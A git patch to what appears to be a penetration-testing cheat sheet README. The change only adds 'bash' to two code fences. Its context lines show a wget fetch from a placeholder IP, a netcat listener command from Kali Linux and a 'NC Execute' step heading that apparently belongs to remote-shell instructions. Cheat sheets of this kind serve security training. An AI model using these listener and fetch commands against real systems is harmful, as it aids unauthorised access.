From c4be10e25af424591ec299cb43ef64d2d1e9a0c6 Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Wed, 3 Aug 2022 19:09:20 -0400 Subject: [PATCH] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 9ba3d10..49ff89c 100644 --- a/README.md +++ b/README.md @@ -407,7 +407,7 @@ wget http://{IP ADDRESS}/{FILE} -outfile {FILE}
-``` +```bash # About: A command used to listen to requests from a defined port # Download: Pre-installed on Kali Linux @@ -421,7 +421,7 @@ sudo nc –lnvp {PORT} ## NC Execute - Server [STEP 2] -``` +```bash # With Netcat installed # Usage - Windows